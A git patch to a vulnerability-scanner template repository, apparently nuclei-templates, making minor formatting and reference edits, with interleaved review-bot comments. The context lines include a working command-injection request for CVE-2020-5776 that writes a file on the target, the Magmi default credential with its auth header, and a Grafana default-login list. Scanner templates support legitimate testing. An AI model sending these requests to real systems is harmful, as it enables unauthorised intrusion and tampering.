From 2a320412bf333126653a8c997eb72dfa2c87df67 Mon Sep 17 00:00:00 2001
From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com>
Date: Thu, 19 Aug 2021 17:25:01 +0300
Subject: [PATCH] Misc (minor)

Related nuclei tickets:
* #259 - dynamic key-value field support for template information
* #940 - new infos in template
* #834
* RES-84
---
 CONTRIBUTING.md | 2 +-
 cves/2017/CVE-2017-7391.yaml | 5 +++--
 cves/2020/CVE-2020-11991.yaml | 2 +-
 cves/2020/CVE-2020-25223.yaml | 2 +-
 cves/2020/CVE-2020-5776.yaml | 4 ++--
 cves/2020/CVE-2020-5777.yaml | 2 +-
 default-logins/grafana/grafana-default-credential.yaml | 3 +--
 technologies/magento-detect.yaml | 5 +++--
 8 files changed, 13 insertions(+), 12 deletions(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 61084b76db..64b9408cf0 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -53,7 +53,7 @@ git checkout -b template_branch_name
 git add .
 ```
 
-- To commit give a descriptive message for the convenience of reveiwer by:
+- To commit, give a descriptive message for the convenience of the reviewer by:
 
 ```sh
 # This message get associated with all files you have changed
diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml
index fab72d8d74..a3ebfb4f8d 100644
--- a/cves/2017/CVE-2017-7391.yaml
+++ b/cves/2017/CVE-2017-7391.yaml
@@ -6,8 +6,9 @@ info:
   severity: medium
   description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
   tags: cve,cve2017,magmi,xss
-  reference: https://github.com/dweeves/magmi-git/issues/522
-  # Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
+  reference:
+    - https://github.com/dweeves/magmi-git/issues/522
+    - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
 
 requests:
   - method: GET
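Review bot: The second entry added to `reference:` in CVE-2017-7391.yaml is the download of the vulnerable Magmi release, which the removed comment labelled `Download:`; it is not an advisory, issue or vendor link, and once it sits in the list nothing distinguishes it from one, so anything that follows references will fetch a zip. Keep the intent visible with a comment above that entry, e.g. `# vulnerable release used to reproduce the finding`, or leave it as a comment as before. The `info` block starts before the hunk, so whether other references exist is not visible here.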
diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml
index 18f07c95ee..043b9aeaa0 100644
--- a/cves/2020/CVE-2020-11991.yaml
+++ b/cves/2020/CVE-2020-11991.yaml
@@ -14,7 +14,7 @@ requests:
     path:
       - "{{BaseURL}}/v2/api/product/manger/getInfo"
     headers:
-      Content-type: "text/xml"
+      Content-Type: "text/xml"
     body: |
       ]>
diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml
index 9688a0fa4b..21cf8027b4 100644
--- a/cves/2020/CVE-2020-25223.yaml
+++ b/cves/2020/CVE-2020-25223.yaml
@@ -19,7 +19,7 @@ requests:
         Accept-Encoding: gzip, deflate
         X-Requested-With: XMLHttpRequest
         X-Prototype-Version: 1.5.1.1
-        Content-type: application/json; charset=UTF-8
+        Content-Type: application/json; charset=UTF-8
         Origin: {{BaseURL}}
         Connection: close
         Referer: {{BaseURL}}
diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml
index af8c29283c..513a3be8c5 100644
--- a/cves/2020/CVE-2020-5776.yaml
+++ b/cves/2020/CVE-2020-5776.yaml
@@ -17,14 +17,14 @@ requests:
       - |
         POST /magmi/web/magmi_saveprofile.php HTTP/1.1
         Host: {{Hostname}}
-        Content-type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
         Connection: close
 
         profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
       - |
         POST /magmi/web/magmi_run.php HTTP/1.1
         Host: {{Hostname}}
-        Content-type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
         Connection: close
 
         engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml
index 830da22728..6dbfb02778 100644
--- a/cves/2020/CVE-2020-5777.yaml
+++ b/cves/2020/CVE-2020-5777.yaml
@@ -10,7 +10,7 @@ info:
 
 # Response code 503 indicates a potential successful "Too many connections" error
 # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
-# whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
+# with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
 # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
 
 requests:
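Review bot: Nothing in the CVE-2020-5776.yaml hunk, or in the part of the template visible here, marks this check as intrusive: the body of the first raw request (context line starting `profile=default&...`) carries a `REINDEX%3Aphpcli=` value that URL-decodes to a shell command writing `info.php` under the target's `magmi/web` directory, and the second request starts the import, so a successful run appears to leave a file on the target that the template never removes. Since the commit already edits these requests, the `info` block (outside the hunk) should say so, e.g. `# Intrusive: a successful run writes /magmi/web/info.php on the target and does not clean it up`, and the tags should carry the repository's intrusive marker if it has one, so operators can exclude it from routine scans. The `raw:` list and the `info` section both start before the hunk.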
diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml
index 7f783dfd10..377385c534 100644
--- a/default-logins/grafana/grafana-default-credential.yaml
+++ b/default-logins/grafana/grafana-default-credential.yaml
@@ -23,8 +23,7 @@ requests:
         - prom-operator
         - admin
 
-    # Added default grafana and prometheus user.
-    # Source: https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
+    # Added default grafana and prometheus user. reference[2]
 
     attack: sniper
diff --git a/technologies/magento-detect.yaml b/technologies/magento-detect.yaml
index ee57eac989..de461a9837 100644
--- a/technologies/magento-detect.yaml
+++ b/technologies/magento-detect.yaml
@@ -5,6 +5,8 @@ info:
   author: TechbrunchFR
   severity: info
   description: Identify Magento
+  reference:
+    - https://devdocs.magento.com/guides/v2.4/graphql/
   tags: magento
 
 requests:
@@ -14,8 +16,7 @@ requests:
       - '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
 
     # There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
-    # consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
-    # https://devdocs.magento.com/guides/v2.4/graphql/
+    # consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1]
 
     matchers-condition: or
     matchers:
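Review bot: The rewritten comment in grafana-default-credential.yaml now points at `reference[2]` by list position, but the StackOverflow URL it replaces is not added anywhere in this patch (the diffstat records 1 insertion and 2 deletions for the file), so either that entry already exists in `info.reference` outside the hunk or the source of the credential list is simply lost; please verify it is there. A positional index also breaks silently when the list is reordered, so naming the target is safer, e.g. `# Added default grafana and prometheus user; source is the StackOverflow link under info.reference`. The same pattern appears in the second hunk of technologies/magento-detect.yaml, where the comment says `reference[1]` while the `reference:` list added in the first hunk has exactly one entry, so the index is either 1-based or off by one; `# ... to check; see the Magento GraphQL docs under info.reference` avoids the ambiguity. Both comments sit inside `requests` blocks whose start is outside the hunk.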